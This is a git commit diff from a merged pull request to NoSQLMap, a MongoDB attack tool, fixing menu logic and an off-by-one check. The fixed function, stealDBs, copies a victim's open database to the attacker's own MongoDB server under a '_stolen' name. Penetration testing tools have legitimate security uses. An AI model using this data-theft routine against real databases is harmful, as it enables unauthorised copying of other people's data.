Merge pull request #41 from youngyangyang04/0.5.1.1

tcstool · tcstool · commit 0ff71dc7b4e5 · 2016-06-04T10:33:16.000-05:00
fix a little bug of logic
diff --git a/nosqlmap.py b/nosqlmap.py
@@ -93,7 +93,7 @@ def mainMenu():
 			options()
 
 		elif select == "2":
-			if optionSet[0] == True:
+			if optionSet[0] == True and optionSet[4] == True:
 				if platform == "MongoDB":
 					nsmmongo.netAttacks(victim, dbPort, myIP, myPort)
 
diff --git a/nsmmongo.py b/nsmmongo.py
@@ -154,7 +154,7 @@ def stealDBs(myDB,victim,mongoConn):
 	while dbLoot:
 		dbLoot = raw_input("Select a database to steal: ")
 
-		if int(dbLoot) > menuItem:
+		if int(dbLoot) >= menuItem:
 			print "Invalid selection."
 
 		else:
@@ -163,9 +163,9 @@ def stealDBs(myDB,victim,mongoConn):
 	try:
 		#Mongo can only pull, not push, connect to my instance and pull from verified open remote instance.
 		dbNeedCreds = raw_input("Does this database require credentials (y/n)? ")
-
+		myDBConn = pymongo.MongoClient(myDB, 27017)
 		if dbNeedCreds in no_tag:
-			myDBConn = pymongo.MongoClient(myDB,27017)
+
 			myDBConn.copy_database(dbList[int(dbLoot)-1],dbList[int(dbLoot)-1] + "_stolen",victim)
 
 		elif dbNeedCreds in yes_tag:
@@ -189,7 +189,8 @@ def stealDBs(myDB,victim,mongoConn):
 		if str(e).find('text search not enabled') != -1:
 			raw_input("Database copied, but text indexing was not enabled on the target.  Indexes not moved.  Press enter to return...")
 			return
-
+		elif str(e).find('Network is unreachable') != -1:
+			raw_input("Are you sure your network is unreachable? Press enter to return..")
 		else:
 			raw_input ("Something went wrong.  Are you sure your MongoDB is running and options are set? Press enter to return...")
 			return
